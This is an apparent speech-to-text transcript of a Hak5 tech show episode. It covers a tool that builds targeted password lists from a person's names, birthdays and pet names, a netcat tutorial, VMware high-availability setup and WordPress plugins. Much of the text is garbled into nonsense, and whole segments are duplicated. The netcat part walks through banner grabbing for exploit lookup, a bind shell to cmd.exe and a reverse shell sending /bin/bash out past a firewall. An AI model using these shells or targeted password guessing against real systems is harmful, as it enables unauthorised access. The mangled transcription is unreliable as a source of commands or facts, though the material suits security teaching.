" War. Coming up on the show virtualization continued. Can you word press blog with awesome free plugin. Fill the -- dictionary for you -- force attacks. Industries of net -- revealed. All that -- times more on this episode of Hak5. This episode of Hak5 is brought to you by Squarespace. Godaddy game flight and you like to you again look at this episode of -- that I. I'm -- and their kids and I met last and this is your weekly does attack --"

" This week and lots of fun I'm looking forward to tomorrow means and a air -- being eaten. Agreements that need 300 sigma. Which is two point. It's -- bright and sunny day in -- you actually have a woodlands I am you have that Iran and that's a lot more and you know the condition that is. First playing with -- and like inside of the circuits and on a boat were -- would -- conditions -- and when I this is gonna be really sunny and just crank up the senators I mean rules. Cotton. And like he appointments password. And -- it. And -- one thing the common user password pro pilots take a look at this I'm. I'm playing back and backtrack four and neck and that's not checked in the head and there is really cool. Utility over act. Remote exploit and it's I'm gonna caught copy because that's the python permits and it's -- you PP. Our company's passenger. I mean that's like dots flashed up B. They what you -- surgery okay so. If you had run out you get this cute little -- animation here of a how I believe and we're gonna run this and an Iraq and what this is is this helps you generates. Passwords for brute force attack so I'm trying to log into that machine I'm have a huge picture file with like all the stuff and he'd have this lately option grows to like. Now replace numbers letters and stuff like that. That's not really specifically targeted towards Mac it doesn't -- his personality. So this -- generate a it password dictionary list that would be geared towards you and -- in public with it dictionary lists that are created. So and go through with -- how well this bad boy works so we're gonna all Mac. And see surname is Lestock."

" And his nickname is sue. And his birthday is live C eighteen now 2111. Then. 1982. Right okay and he is wife's name we're gonna just say Shannon. Success snubs. What's birthday. Without the through eighteen with my husband. Milton nineteen it in Britain it. Child's -- we're gonna go ahead and -- Paul. A nickname. Camera camera -- camera guy."

" He and my -- girl I didn't know all what what to birthday did."

" Poland and all the pet's name Kirby. I a company in -- Do and add some special stuff yes we can do you really isn't bolts it. -- The browns. Yeah it is that all that's all -- yet to free you know there and he's involved and on sports and learn what or britney's. Actions. -- and then finally. This commerce all of you can go so. This -- is just getting the characters. We're not in his special characters and let us your random numbers at the end of elements to -- narrowed. And and check this out so it creates this picture here -- I just open up and and a Nat. Router. Out. Apple and and every guy out you know is your password camera -- last -- when it. Is is it. Some -- 1980 to five and I don't messiah thing and I."

" Well no seriously okay because -- you know all of this you probably try every single one of those aren't you know now we have nothing to thousands of these try and I think that's on it your domino it did the user that you're trying to break into is dumb enough. If they're not gonna have 92000. Variations in their brain and it's the quick sort. Systems administrator but you know the deal right go to help the personal computer and you're like I just did you log. Right and I even say I don't want your password just go and law again I -- look away once I remember right. This is like. It's Jordan 1993. Why was it two or three that was her son's -- the year human born right okay. But you are when entering this and you already know. And in Canada your attacker. Okay you party will already know all that stuff about Apple why -- it Jordan 1993 the first thing you're gonna try. Yes. It connects the cards or don't users are that smart the good and yeah Jordan now this but it's the -- and just say it. Now this. Is the lights days get eaten those throat and there that you bought at a time. -- Would. -- guys know that we are on a whole plethora. Different. You know there's -- week."

" Yes we and -- didn't read."

" There's other places and hurt. Somebody -- varieties and I think we would get on iTunes is before the iPod."

" If you have not realizing you're not watching this needs to enhance the capability now HD we are in HD's and -- and subscribe to the HCR's as -- warm -- the iTunes. And you got to -- on YouTube and TiVo and Nero and all of those are at the top five dot org well feelings there it is hard to get us. We as far as TiVo you have to have a TiVo connected box -- entry guys are written in its. You spread the techno lust and we're gonna contest that yet does it involve technolust yes wouldn't call the rash no good. I have to think about -- I really do that we're given and you say we'll do that we'll talk about that later anyway I still coming up later and so that's fallen -- virtualization anytime were pressed up. You guys -- the kitchen and we're gonna go find out a little bit about kiddies and Internet. Actually -- its back with money over here."

" So today I want to talk about net cat. Which is kind of like."

" A TC PI PUDP. Read write who it's an open source tool it's cross platform. And this is one of these things are just want to get through this stuff because it's a real fundamental thing. That would going to be expanding on a little bit later was sort of exploits and and stuff like that. It's what what can be considered a Swiss army knife of TC PA peer at least that's what the developers and call it. And we are going to just learn by example here -- want to see some nifty things he can do when your you know sending. TCP or UDP or listening to that he's here UDP and just reading and writing those packets. Over the wire I'm on with -- so let's take a look at these quick examples and I think you're really gonna rock how powerful this tool is. So first of all. If weekend. Go ahead and and read write TCQ let's go ahead and connect to an HTTP server just like we would look like Tom and a web -- something like that. In a fire -- here and backtrack for a better remote exploit awesome stuff. And it's just and see as the command V for -- Burgos and I'm going to go to 101031. Which is a web server on port eighty. And you'll see that I have indeed connected and it knows it's a web server WWW. And I and a right in here and flash HTTP. Slash one point one right. When I do that I again bad request but what's important here. Is that I actually get header. From you know the band error. This of this HTTP server can tell that it's an Apache two point two point eleven server that's what's -- is like -- grabbing seeking justice tool. To say like here using an app or something you found. Hey. You know something interest in you could go. And use this to kind quarry that service whether it's like an HTTP server and ftp server assets whenever right. And in many cases you can get version numbers which are important for when you want to maybe look there's an exploit for that something. We can also uses that to as a rudimentary chat so what I'm gonna do here since it's a read and write whole kind of envisioned as a client and server cool. I'm going to be showing you a couple of examples here with my machine and backtracked three anti back -- four and also my Vista machine upstairs so like I said net hat is cross platform so happy here and windows and we're gonna do is demonstrate how we can use it to do rudimentary chat. -- an issue neck hat -- V for for bios and yet -- LP for listen on port one needs 1234. -- the windows machine it just listening on TCP port 12 before or whatever. It it's it's real raw TCP. It's beautiful so we're going to come back to the Linux side. And an issue -- hat technique and I'm gonna give the IP 1010 31. And port 1234. And we've connected. But there's nothing really going on we come back here look at -- to school this over take a look at our. A windows side and we don't have anything interesting. Until I typed hello there we go right so. You know we can have a very rudimentary chat if if you had recently -- and it -- my little reminiscent. But there's a basic idea of how does working -- and it's like raw serial connection but it's at TCP UDP. So -- that give you an idea of -- so we can send data while with some interest in pipes we can actually send some files so let's go ahead and create a file here. And send it. Q our friend the windows machine and this is something that you could use if you want to. Points instance want birds to some real quick easy way didn't have -- set up to a CP file over we're. FT PUT it to -- email or whatever you just get a file across networked real simple like this. So. Word that what we're gonna go ahead and do is listen on. Are certain what will consider our server side so on the witness and indeed attacked -- And listen on port 1234 again. And this time you can see I am going to give it a little walk there. And in fact that moment now we're gonna it a file to send it so go ahead and touch Tina here. And -- act oh. Is smoke and two Tina -- Right and now we have but what does -- make sure it's there. Great it's there so I'm going to send that file over to the windows machines using fat cat now I just -- The and and I'm gonna give it the port answered B can and then port which just and and those 31. On port 1234. And now on any given to walk the other direction and saying send this file into you and that file of course is. Press and are actually refuse beautiful because we are not listening. Okay so let's come back over here and say ten. Answer -- and now we're listening and were expecting what every data that we get through there to be pumped. To the -- in effect on the windows side we run this again on the Linux side there are. You went on here as we don't get late night not like you home W again has a beautiful little status indicator when it like a pilot transferred we get no information like that. Since it's long and it's done this and you know break out of it and make sure its there so I'm going to TAR Tina. There it is and I'm going to type. And it's not there outside mean -- he is that. Now there are two other interest seeing examples and I want to show you become a powerful -- I can really get and then. Later on we'll talk about some other amazing stuff he can do the first I want to do is show you guys how you can set up. What's called a cotton and -- direction we're going to bind it a shell or a program or anything like that. To an act cat just as we did this file. So. In this instance what I'm going to deal on the windows side. Is I'm going to set up -- had to listen. But we're also going to have -- bind the CMD. The idea exe or the command prompt so on the windows side here it's and sea tac. The LDP. For listen for those on port. 1234. And Tak EC indeed -- okay so that's listening. For connection. Two or 1234 and when it does it's going to bind that to the command prompt. So back over here Lennox and see from -- Kat -- B and I'm going it's a and attend -- 31. And again 1234. Open. And just moment here. There yep you can see I have to -- on the -- tools I can say it now type Tina. And there we go. So. This is a great way to you know quickly set up a show and you don't have this stage or some other nefarious -- so that -- going to be getting into later. Now the thing about this is is seem like one of these machines it's like behind firewall or something like that maybe it was machine on the inside of about corporate network right and we can't just. Port forward Nilly -- we -- we're not public facing and we would like to get back to that machine later from you now that they. The convenience of a packed house for instance well. We can easily. Just listen on an important what we can do is do the reverse of that. We can send the show to a listener so in that and simple we're gonna do is set up. The windows -- here to be the listener and for that and C dash LDP. 1234 so we're listening for votes on port 1234. And let's pretend let's go back over polemic side here let's pretend that this machine is. The machine that's behind the firewall we want to send it. Our. -- so in that instance just like we're doing before with the tacky of CD we're going to send it in bash that'll be. And see attack the and and and and that and a -- 31 because that is public facing. Or in -- instance example an attack -- slash bin. Slash bash which is the equivalent proceed in the and acts. And area would come over here and you don't really see a whole lot just let's just that were connected. But if we issue -- here there we go we actually have a directory listing. And you know we can. Can run top we can. You know run whatever. And we are on that machine. Now there's a whole lot of other interesting things you can do with -- has an interest in what countries have you do with it so definitely hit me up feedback Hak5 dot org that. And actually have a couple of user's submitted ones here -- some some crazy ideas that you guys. Do cabins on the rights to tell me that he actually uses this detail log files lot of sense to run process someone's server. You need to go to another computer's monitor it. Without have to -- like the NC session. Up precious Roy mentioned that you can actually use this to DD or to do a disk image of hard drive from one computer to another computer. Over the Internet and I'll have links to to an article on how to do that show notes. Joey Adams. Says that this is a great way to import -- direction which we -- be talking about next week and then puts plastic or his email actually came from domain administrator so he does -- letting. And it. He mentions that you cannot use this is -- like we showed you with the port eighty connecting to -- web server. What he likes to send a user agent Internet Explorer 22. Just really screw with people that check -- there in server logs -- the reaper from like lemon party years like that. Which is. Quite mean anyway. -- that -- awesome tore open source highly recommend check it out -- the Mac as whatever. Have links -- on ways to do this and I want to let you know that we are going to be dealing. The some stuff that involves litter on the right now and then go and and -- and the we have virtualization coming up with and before them let's find out what's going on this week's Lan party."

" Right guys get ready I know you've been waiting for it this -- we airplanes. Goldeneye stories yes that's right. We're gonna be playing over and -- dot Hak5 dot org highs Saturday may thirtieth at the end of this might get prepared. And if you want to check out any cool games and local Lan parties say -- excited about. You can go over to Hak5 land fast Squarespace dot com and sign up and vote for your favorite game. Hey -- has a little bit of information for us about placing."

" That's right want to think Squarespace for sponsoring Lan party and I'm here on our land party page -- nifty feature it looks like I'm just on the page but get this extra button here and posts an entry and I can do just that. Fill in my details here. What's nice and get a rich text editor and it's kind of like a -- he -- easy buttons here that rich media like an added. Image here from the direct pure out. And what's nice is right there with then why copy I can go ahead and grab these little selection boxes and resize my image. Right from within my documents -- it and a volunteer community -- and take a look at how. Versus just a powerful you can get your Squarespace plan. Over Squarespace soc column use coupon code Hak5 and get 10% off the light of your service."

" Thank you Darren and up next we have some. Awesome information from -- about virtualization and over at his office was -- join us."

" Our -- so we are here back in my lovely office in Williamsburg Virginia four part two of our virtualization segment. Or intro or series if you want -- Got a lot of good feedback about the first episode that we did which was basically just a intro into the cost savings associated with virtualization. Today we're gonna do is red tape that's one more step further and instead of going into the cost benefit from going into the a disaster recovery or high availability. Women -- Dusan to show you some best practices. -- implementing a multi post. With sand connected storage. Wore like a cluster or so someone and so port. So let's go ahead and take a look at the white -- here. -- to do is -- and drop the best practices for networking. And storage so let's start with our two -- would say we've got -- to host virtual. Machines like the 900 that I mentioned yesterday. And I only said that I have one but. We don't have the money for a second one. So go ahead and start with post number one. And host number two. And these are both running. VMware yes sex three point five. So by themselves they would be you know great standalone virtual machine hosts however what we want to do is we want to actually utilize. A third box. This is gonna be our master controller or virtual senator server. Virtual senator's gonna connect these two boxes. It's gonna say hey I now -- two posts in this. Landscape if you will. And from there we can actually manage all of the virtual machines from. Virtual center server instead of logging into -- one -- it's a certain set of virtual machines or box to manage a you know another -- of virtual machines so we've got virtual center are all hooked up now we need to hook up. Networking and we do that while best practices state that you should have fully redundant. You know paths to. Each of you war hosts. So now we've got to. Network switches. Intact but we do is. You've got you know you're interconnectivity. In coming through so one to hear once there once a year one there. So now if one of these switches goes down. Switch to kicks back in and does its thing now networking is a lot easier in the new version of VMware infrastructure which now called the sphere. Horrible name great product. Which makes it setting up a data center. Network a lot easier. I don't have access to the beta but rest assured as soon as we do get access to it I'll -- and much as -- Ohio exactly setup networking. The other things you wanna do is you want to have a another set of switches. These will be you or. I SCSI switches won't mention broke that don't think we're using blue anymore but -- black. So now we've got two more -- here."

" The tank and we've got our."

" Our -- here obviously. Replicating sand is a little costly -- need to get into the EMC. You know high and people logic actually replicate sand. Stored so we're gonna do is we're actually gonna go ahead and you just like we did -- Yes so this comes down here. And then this one comes down here in this one is here and this from those here. TC aware trying to. To implement yeah this is gets a little crazy however when you think about it in terms of okay. I have one point of failure. Not gonna point one point there point one point so this really becomes then you are single. Point of failure for you know hardware wise now we can try and you know. Alleviate that by going to see a a properly architect a great fifty which is basically in the one. Is a group of -- three in my case three drives in one spindle. Three drives another spindle. Okay so these would each be raid five. In fact. And then once we have all these raid five created. We go ahead. Actually that's wrong. We actually -- these. To a raid. There are intact so. One of these each one of these is a raid five -- Which makes rebuilding should one of these drives fail. Quicker occasional at the rebuild say twelve terabyte -- And also you get the speed of striking across. Raid five -- so you've you've kind of mitigated the problem of having a centralized storage solution. Okay now the nice thing about VMware. Yes sex. Or actually should say virtual center is now bolt on applications that they have you can have. These are asks. Which is I believe dynamic resource sharing. Where it'll monitor if box one is that 80%. And box too is that 20%. You can set a threshold of I would only want these boxes to be you know peak utilization at 60% that's what. View it dot via where virtual senate will do is it will live migrate. Using storage would they called the emotion and all these products have been -- so bear with me. It'll migrate a certain number of the hands. Over here to balance wow. To your. -- To your specifications on the other nice thing is like I said with you've got down. The motion. And you can go ahead and live my great with no down time. From this -- say you have hardware failure when your ram sticks his dad or you know you've got upgrades that you need to do to the biased results some funky thing. You can actually push everything over with. Like minimal interruption in service we're talking less then. Five seconds. Where you could push all the virtual machines and then you could safely. You know bring this machine down war. You know upgraded and then from here push everything over to the same to this one. So here is the ideal. Set up for you or VMware implementation. Sand. Redundant switches. Redundant switches for your network. Redundant controllers. And if you want it to you can even have multiple virtual center controllers. Now then I guess said I gotta Lotta good comments about my set up my set up is. Like a -- beginning of last week not ideal single point failure and server. You know sands space is an an issue not only got one network. This is a very costly set up not only do two you know licensing fees what actually all the hardware that you're gonna need to purchase however. This is probably the easiest ways to do high availability which is exactly what we've got set up here. Dynamic resource sharing. Think about you know of that when your implementing a solution for us he's a software which is. Millions of dollars in in which might -- these cases this AP so. You know -- you know however much it is -- 12550000. Dollars in in implementation like this you can actually get away with. And your cap X budgets are tight. But. I really think if you haven't already. Go ahead should mean email with your questions matter Hak5 or post month forums. -- but if you have any questions about you know how to architect virtualization. I'm probably I'm sure I'm probably missed something here but. -- now me I'll be sure to answer it on an upcoming episode when we actually showed you how to. Set these things up so for more on this head on over to -- on dot com or. --"

" Our guys once again it's time to tell you guys about trivia or so the walk is called now first of all we have to talk about that monkey contest. The winner is announced right now and it's things. Spike CD you -- we went through a lot of is awesome submissions everybody did a great job I if I can give you a Little League trophy all what. But we're actually getting -- CP an epic sock monkey Amazon's that it is very -- like this pictures. From. -- There -- And that's what a legitimate -- coding challenges going on. You can get all the details. -- to challenge PHP. Two Gmail pads and a lot of fun -- so RTC's great submissions. They're still coming days to get in on it so make sure you check that out. The winner of such contests announced next week and -- 512 will win. The awesome if you reference book by -- and it is really enjoy that. And before we get to this week's. --"

" thank you so much for sponsoring this episode of tax side. If you want to make an impact online godaddy.com has what you need dot com names as low as dollars 99 plus world class hosting -- web site builders and much more. In that he is could hack one that is JK one -- can get 10% off your order. Some restrictions apply see the website for details and get your piece of the Internet and godaddy.com. Darren take --"

" Alright so here it is this week's. Contest. Saying he is actually in Easter egg hunt. So I think you guys are really going to enjoy this pixel what you already learned in this episode and apply it RTT."

" Dot Hak5. Dot org that's your only -- are right. And next week we'll talk about it and do some stuff and basically you get in on this Easter egg hunt here and find the answer. And you'll find how to submit it when you find the answer. You will be eligible to win not only a lock of matte hair but a deluxe Hak5 hack packs and -- months. So anyway I hope you guys get in on that and right now and you can get tackled British and find out about word press -- to -- your blog."

" So this past week I have been travelling all over the word press -- looking for my favorite one again so I went through hundreds of them. And I found us what would you would column. My top ten. The first one want to talk about is twit me it basically takes your blog post and transfers it straight over to Twitter. And I have up example moderate hearing just -- that this is a test an automatic medically types and whatever you want it to and it gives a link over to use. York luck. The second one I want to talk about. Is called socialite -- does pretty much the exact same thing except that works for FaceBook MySpace and Twitter. I personally like twit anymore for Twitter so I just you socialite bespoke. In MySpace so I can get all my blog post transfer Everett all sorts of different social networks at the same exact time. Sociable is pretty cool this one actually gives you. A whole bunch -- share this icons and you have 99 different ones to choose from you can choose your favorite wants to link to you. Mary -- that's all you need enough. The next one I found out about what's called mobile press this and I can actually show you on my phone it actually made it might. Log into a mobile blog. So it shows up perfectly clean and clear for anybody who wants to go on my blog on there. On their cell phones except for some reason it doesn't work from Blackberry it just works on iphones and palms. From what I know. My favorite line is can't resize at upload -- This one basically takes your images that you upload -- blog to any of your new entries. And automatically turns Bennett in two years defiant width and height and nothing over the maximum that you issues so on my site I made all of my turn. Turn out to be less than 500. No more than 500 or -- it'll copy everything on the side -- here you can see. This picture actually is about at a now 1024 by 768 or something and and I made it. A whole 500 pixels wide. The next plug in that I've found is called WP security scan. It scans your word -- installation through security vulnerabilities. In it suggests corrective action so on mine you can see I have a certain version and I have the latest stable version. I don't have any. I have a table prefix that is not WP. In at stop at the bottom it says that I have admin. An admin users that still exist I should probably fix that and it gives me some ideas on how to fix it right click the button. It says how to change we're press admin username so it gives me ideas on how to fix that. Okay word press backup that's really good tool for pretty much everybody to have it backs up pretty much your entire database of your blog and automatically emailed it to whatever email address that you want it to you. I decided to make mine emailed me. Once a week with all of my database files and one zip file it's a great program for anybody his worried about losing their information on their website. WP band is one of my favorites. I've used it since I first started off with my blog and it's very very helpful if you have anybody go into your site that spans the latter says -- thing means yet. Whatever it ends IP incipient IP ranges -- names and refer URLs that try to visit your blog. You can even redirected to go to other web sites so I have one of mine going to. I think it's this. I -- a new image. It works really well so I definitely. What you get to -- it right. The very last one that I want to tell you about is called pixel stats. Pixels stacks is basically basically very minimal. Google analytics for your website if you're not really into the whole thing in you know your interest in on how many views you have. Your interest in and a couple of those things but you don't really care about the analytics -- keywords that people actually -- then it -- to your blog. You contrivance pixels that's just gives you total views you need to use unique visitors just a couple of things that here. A little interested but not that much. If you guys have any interesting. Plug in or even widgets for your blogs that you want to check out definitely hit me up that feedback at Hak5 hour and tell me what you think."

" I think we're going to end the show now. -- go grab the guys. Hey guys that absent that an -- by. The buttons and."

" Rock and and until nine -- a huge fan of it as he is this next to stroh's and."

" It's the only download information please think before we talk about that."

" It is -- all that stuff."

" I want to let everybody knows that. Dean Klein is enemies -- they are the largest online video game rental service and offer choice of over 6000 new and classic titles -- all councils and elves which plants are you 15951. Game by members can rent one to four games at a time and keep them for as long. As they like you can also purchase a game you fall in love with it adults into the box and manual. Pornography. And on over to gain slide dot com slash Hak5 to get. Two week free trial membership -- line dot com."

" Slash -- I can't see it's. All Italy where it or just finishing that's great sounds the rent in China that they had to -- content for the hawks but."

" It's a -- game but it."

" Did send it back isn't short your plan leopard gays and our bill it's really mentions the night before so I'm always."

" Unhappy Miami's. I tell you -- abouts thinker yeah. We just watched the newest episode of Digg Reel last week it was episode number 67. -- talk to you Mythbusters."

" Yeah that's right -- but it did not have any video from the the one with the rockets smash is it's under the canals and it it."

" Flatten the -- it was so cool and what you guys gotta check it out Revision 3 dot plastic real. It's. My. Oh yeah and Andrew got zapped place. Simple it -- Clinton about it. With the yeah."

" Mr. you've got him. And Texas not -- Yes I'm checking out -- nine point four just in in this accident netbook -- next question is specifically for these talk with you so love that. And it's -- both of -- things look in one. The interface is interesting here we can just like drill down here and it's like all of these little menus and what's what's kind of -- about is when you can these programs just chill up here in the top left. And everything's like -- full screen. So oh you know. Makes it. Well. For doing one thing at a time but. Yeah I'm -- resolution on these little tiny. Bastards. It. -- Thanks it's an awesome firmware bias on. Yet just sticking to backtrack for -- years. And it's. -- Yes we asked about we can talk about getting career -- Is it only -- an ass off. For example now actually I I'll give you the list and certifications and degrees because it's really about the letters after. -- I've actually had -- hundred prefix YouTube because it makes. As an awesome blog post it's immediately along with this flash worked in and it is an excuse our industry. We'll know allocate your writer he doesn't it in a year -- completely. It is it is but here already. And you're looking for something he he actually gave a presentation did you stack is -- video it's about how to go from -- career and eighty hours or less so now president and interest that stuff and creates an expert."

" To remember guys we've got the new Hak5 website launching in the next. We episode next next week. Along with the new story that there has promised a populated with all brand new goodies I know all in there and our. Working -- and it a promotional video for you guys that you can. The really excited about -- and there were one sure who got so -- so you can honestly -- which that's true and -- Hak5 dot org slash stickers to support the show remember iTunes TiVo Miro."

" You two digit technolust are assessed weekly and we like it was the first world for the coming out. There's a reason for that this wouldn't answer -- that and also share your techno clubs. All right guys you see you next week's meantime upon -- it."

" It's."

" Like Leo how are you the girl and that's and we'll get visual basic. All going to call coming. Being used."

" That's -- week."

" War. Coming up on the show virtualization continued. Can you word press blog with awesome free plugin. Fill the -- dictionary for you -- force attacks. Industries of net -- revealed. All that -- times more on this episode of Hak5. This episode of Hak5 is brought to you by Squarespace. Godaddy game flight and you like to you again look at this episode of -- that I. I'm -- and their kids and I met last and this is your weekly does attack --"

" This week and lots of fun I'm looking forward to tomorrow means and a air -- being eaten. Agreements that need 300 sigma. Which is two point. It's -- bright and sunny day in -- you actually have a woodlands I am you have that Iran and that's a lot more and you know the condition that is. First playing with -- and like inside of the circuits and on a boat were -- would -- conditions -- and when I this is gonna be really sunny and just crank up the senators I mean rules. Cotton. And like he appointments password. And -- it. And -- one thing the common user password pro pilots take a look at this I'm. I'm playing back and backtrack four and neck and that's not checked in the head and there is really cool. Utility over act. Remote exploit and it's I'm gonna caught copy because that's the python permits and it's -- you PP. Our company's passenger. I mean that's like dots flashed up B. They what you -- surgery okay so. If you had run out you get this cute little -- animation here of a how I believe and we're gonna run this and an Iraq and what this is is this helps you generates. Passwords for brute force attack so I'm trying to log into that machine I'm have a huge picture file with like all the stuff and he'd have this lately option grows to like. Now replace numbers letters and stuff like that. That's not really specifically targeted towards Mac it doesn't -- his personality. So this -- generate a it password dictionary list that would be geared towards you and -- in public with it dictionary lists that are created. So and go through with -- how well this bad boy works so we're gonna all Mac. And see surname is Lestock."

" And his nickname is sue. And his birthday is live C eighteen now 2111. Then. 1982. Right okay and he is wife's name we're gonna just say Shannon. Success snubs. What's birthday. Without the through eighteen with my husband. Milton nineteen it in Britain it. Child's -- we're gonna go ahead and -- Paul. A nickname. Camera camera -- camera guy."

" He and my -- girl I didn't know all what what to birthday did."

" Poland and all the pet's name Kirby. I a company in -- Do and add some special stuff yes we can do you really isn't bolts it. -- The browns. Yeah it is that all that's all -- yet to free you know there and he's involved and on sports and learn what or britney's. Actions. -- and then finally. This commerce all of you can go so. This -- is just getting the characters. We're not in his special characters and let us your random numbers at the end of elements to -- narrowed. And and check this out so it creates this picture here -- I just open up and and a Nat. Router. Out. Apple and and every guy out you know is your password camera -- last -- when it. Is is it. Some -- 1980 to five and I don't messiah thing and I."

" Well no seriously okay because -- you know all of this you probably try every single one of those aren't you know now we have nothing to thousands of these try and I think that's on it your domino it did the user that you're trying to break into is dumb enough. If they're not gonna have 92000. Variations in their brain and it's the quick sort. Systems administrator but you know the deal right go to help the personal computer and you're like I just did you log. Right and I even say I don't want your password just go and law again I -- look away once I remember right. This is like. It's Jordan 1993. Why was it two or three that was her son's -- the year human born right okay. But you are when entering this and you already know. And in Canada your attacker. Okay you party will already know all that stuff about Apple why -- it Jordan 1993 the first thing you're gonna try. Yes. It connects the cards or don't users are that smart the good and yeah Jordan now this but it's the -- and just say it. Now this. Is the lights days get eaten those throat and there that you bought at a time. -- Would. -- guys know that we are on a whole plethora. Different. You know there's -- week."

" Yes we and -- didn't read."

" There's other places and hurt. Somebody -- varieties and I think we would get on iTunes is before the iPod."

" If you have not realizing you're not watching this needs to enhance the capability now HD we are in HD's and -- and subscribe to the HCR's as -- warm -- the iTunes. And you got to -- on YouTube and TiVo and Nero and all of those are at the top five dot org well feelings there it is hard to get us. We as far as TiVo you have to have a TiVo connected box -- entry guys are written in its. You spread the techno lust and we're gonna contest that yet does it involve technolust yes wouldn't call the rash no good. I have to think about -- I really do that we're given and you say we'll do that we'll talk about that later anyway I still coming up later and so that's fallen -- virtualization anytime were pressed up. You guys -- the kitchen and we're gonna go find out a little bit about kiddies and Internet. Actually -- its back with money over here."

" So today I want to talk about net cat. Which is kind of like."

" A TC PI PUDP. Read write who it's an open source tool it's cross platform. And this is one of these things are just want to get through this stuff because it's a real fundamental thing. That would going to be expanding on a little bit later was sort of exploits and and stuff like that. It's what what can be considered a Swiss army knife of TC PA peer at least that's what the developers and call it. And we are going to just learn by example here -- want to see some nifty things he can do when your you know sending. TCP or UDP or listening to that he's here UDP and just reading and writing those packets. Over the wire I'm on with -- so let's take a look at these quick examples and I think you're really gonna rock how powerful this tool is. So first of all. If weekend. Go ahead and and read write TCQ let's go ahead and connect to an HTTP server just like we would look like Tom and a web -- something like that. In a fire -- here and backtrack for a better remote exploit awesome stuff. And it's just and see as the command V for -- Burgos and I'm going to go to 101031. Which is a web server on port eighty. And you'll see that I have indeed connected and it knows it's a web server WWW. And I and a right in here and flash HTTP. Slash one point one right. When I do that I again bad request but what's important here. Is that I actually get header. From you know the band error. This of this HTTP server can tell that it's an Apache two point two point eleven server that's what's -- is like -- grabbing seeking justice tool. To say like here using an app or something you found. Hey. You know something interest in you could go. And use this to kind quarry that service whether it's like an HTTP server and ftp server assets whenever right. And in many cases you can get version numbers which are important for when you want to maybe look there's an exploit for that something. We can also uses that to as a rudimentary chat so what I'm gonna do here since it's a read and write whole kind of envisioned as a client and server cool. I'm going to be showing you a couple of examples here with my machine and backtracked three anti back -- four and also my Vista machine upstairs so like I said net hat is cross platform so happy here and windows and we're gonna do is demonstrate how we can use it to do rudimentary chat. -- an issue neck hat -- V for for bios and yet -- LP for listen on port one needs 1234. -- the windows machine it just listening on TCP port 12 before or whatever. It it's it's real raw TCP. It's beautiful so we're going to come back to the Linux side. And an issue -- hat technique and I'm gonna give the IP 1010 31. And port 1234. And we've connected. But there's nothing really going on we come back here look at -- to school this over take a look at our. A windows side and we don't have anything interesting. Until I typed hello there we go right so. You know we can have a very rudimentary chat if if you had recently -- and it -- my little reminiscent. But there's a basic idea of how does working -- and it's like raw serial connection but it's at TCP UDP. So -- that give you an idea of -- so we can send data while with some interest in pipes we can actually send some files so let's go ahead and create a file here. And send it. Q our friend the windows machine and this is something that you could use if you want to. Points instance want birds to some real quick easy way didn't have -- set up to a CP file over we're. FT PUT it to -- email or whatever you just get a file across networked real simple like this. So. Word that what we're gonna go ahead and do is listen on. Are certain what will consider our server side so on the witness and indeed attacked -- And listen on port 1234 again. And this time you can see I am going to give it a little walk there. And in fact that moment now we're gonna it a file to send it so go ahead and touch Tina here. And -- act oh. Is smoke and two Tina -- Right and now we have but what does -- make sure it's there. Great it's there so I'm going to send that file over to the windows machines using fat cat now I just -- The and and I'm gonna give it the port answered B can and then port which just and and those 31. On port 1234. And now on any given to walk the other direction and saying send this file into you and that file of course is. Press and are actually refuse beautiful because we are not listening. Okay so let's come back over here and say ten. Answer -- and now we're listening and were expecting what every data that we get through there to be pumped. To the -- in effect on the windows side we run this again on the Linux side there are. You went on here as we don't get late night not like you home W again has a beautiful little status indicator when it like a pilot transferred we get no information like that. Since it's long and it's done this and you know break out of it and make sure its there so I'm going to TAR Tina. There it is and I'm going to type. And it's not there outside mean -- he is that. Now there are two other interest seeing examples and I want to show you become a powerful -- I can really get and then. Later on we'll talk about some other amazing stuff he can do the first I want to do is show you guys how you can set up. What's called a cotton and -- direction we're going to bind it a shell or a program or anything like that. To an act cat just as we did this file. So. In this instance what I'm going to deal on the windows side. Is I'm going to set up -- had to listen. But we're also going to have -- bind the CMD. The idea exe or the command prompt so on the windows side here it's and sea tac. The LDP. For listen for those on port. 1234. And Tak EC indeed -- okay so that's listening. For connection. Two or 1234 and when it does it's going to bind that to the command prompt. So back over here Lennox and see from -- Kat -- B and I'm going it's a and attend -- 31. And again 1234. Open. And just moment here. There yep you can see I have to -- on the -- tools I can say it now type Tina. And there we go. So. This is a great way to you know quickly set up a show and you don't have this stage or some other nefarious -- so that -- going to be getting into later. Now the thing about this is is seem like one of these machines it's like behind firewall or something like that maybe it was machine on the inside of about corporate network right and we can't just. Port forward Nilly -- we -- we're not public facing and we would like to get back to that machine later from you now that they. The convenience of a packed house for instance well. We can easily. Just listen on an important what we can do is do the reverse of that. We can send the show to a listener so in that and simple we're gonna do is set up. The windows -- here to be the listener and for that and C dash LDP. 1234 so we're listening for votes on port 1234. And let's pretend let's go back over polemic side here let's pretend that this machine is. The machine that's behind the firewall we want to send it. Our. -- so in that instance just like we're doing before with the tacky of CD we're going to send it in bash that'll be. And see attack the and and and and that and a -- 31 because that is public facing. Or in -- instance example an attack -- slash bin. Slash bash which is the equivalent proceed in the and acts. And area would come over here and you don't really see a whole lot just let's just that were connected. But if we issue -- here there we go we actually have a directory listing. And you know we can. Can run top we can. You know run whatever. And we are on that machine. Now there's a whole lot of other interesting things you can do with -- has an interest in what countries have you do with it so definitely hit me up feedback Hak5 dot org that. And actually have a couple of user's submitted ones here -- some some crazy ideas that you guys. Do cabins on the rights to tell me that he actually uses this detail log files lot of sense to run process someone's server. You need to go to another computer's monitor it. Without have to -- like the NC session. Up precious Roy mentioned that you can actually use this to DD or to do a disk image of hard drive from one computer to another computer. Over the Internet and I'll have links to to an article on how to do that show notes. Joey Adams. Says that this is a great way to import -- direction which we -- be talking about next week and then puts plastic or his email actually came from domain administrator so he does -- letting. And it. He mentions that you cannot use this is -- like we showed you with the port eighty connecting to -- web server. What he likes to send a user agent Internet Explorer 22. Just really screw with people that check -- there in server logs -- the reaper from like lemon party years like that. Which is. Quite mean anyway. -- that -- awesome tore open source highly recommend check it out -- the Mac as whatever. Have links -- on ways to do this and I want to let you know that we are going to be dealing. The some stuff that involves litter on the right now and then go and and -- and the we have virtualization coming up with and before them let's find out what's going on this week's Lan party."

" Right guys get ready I know you've been waiting for it this -- we airplanes. Goldeneye stories yes that's right. We're gonna be playing over and -- dot Hak5 dot org highs Saturday may thirtieth at the end of this might get prepared. And if you want to check out any cool games and local Lan parties say -- excited about. You can go over to Hak5 land fast Squarespace dot com and sign up and vote for your favorite game. Hey -- has a little bit of information for us about placing."

